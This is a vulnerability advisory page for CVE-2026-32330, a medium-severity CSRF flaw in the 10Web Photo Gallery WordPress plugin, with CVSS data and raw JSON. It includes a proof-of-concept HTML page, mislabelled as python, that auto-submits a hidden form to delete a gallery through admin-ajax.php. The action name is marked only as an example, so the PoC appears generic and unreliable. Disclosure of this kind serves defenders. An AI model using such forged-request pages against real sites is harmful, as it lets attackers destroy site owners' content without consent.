Security Vulnerability Report
中文
CVE-2026-32330 CVSS 4.3 MEDIUM

CVE-2026-32330

Published: 2026-03-13 19:54:43
Last Modified: 2026-04-22 21:30:26

Description

Cross-Site Request Forgery (CSRF) vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Cross Site Request Forgery.This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37.

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

10Web Photo Gallery by 10Web <= 1.8.37

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CSRF PoC for CVE-2026-32330 --> <!-- Target: 10Web Photo Gallery WordPress Plugin <= 1.8.37 --> <!-- This PoC demonstrates a CSRF attack to delete a gallery --> <!DOCTYPE html> <html> <head> <title>CSRF Attack PoC - CVE-2026-32330</title> </head> <body> <h1>CSRF PoC for 10Web Photo Gallery</h1> <p>Click <a href="#" onclick="submitForm()">here</a> to see the content.</p> <form id="csrfForm" action="http://target-site.com/wp-admin/admin-ajax.php" method="POST"> <!-- Action to delete a gallery (example) --> <input type="hidden" name="action" value="photo_gallery_delete_gallery"> <input type="hidden" name="gallery_id" value="1"> <input type="hidden" name="nonce" value=""> </form> <script> function submitForm() { // Auto-submit the form without user knowledge document.getElementById('csrfForm').submit(); } // Auto-submit on page load (for demonstration) // window.onload = function() { submitForm(); }; </script> <!-- Alternative: Image-based CSRF trigger --> <!-- <img src="http://target-site.com/wp-admin/admin-ajax.php?action=photo_gallery_delete_gallery&gallery_id=1" style="display:none"> --> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32330", "sourceIdentifier": "[email protected]", "published": "2026-03-13T19:54:43.427", "lastModified": "2026-04-22T21:30:26.497", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Cross-Site Request Forgery (CSRF) vulnerability in 10Web Photo Gallery by 10Web photo-gallery allows Cross Site Request Forgery.This issue affects Photo Gallery by 10Web: from n/a through <= 1.8.37."}, {"lang": "es", "value": "Una vulnerabilidad de falsificación de petición en sitios cruzados (CSRF) en 10Web Photo Gallery por 10Web photo-gallery permite falsificación de petición en sitios cruzados. Este problema afecta a Photo Gallery por 10Web: desde n/a hasta &lt;= 1.8.37."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-352"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/photo-gallery/vulnerability/wordpress-photo-gallery-by-10web-plugin-1-8-37-cross-site-request-forgery-csrf-vulnerability?_s_id=cve", "source": "[email protected]"}]}}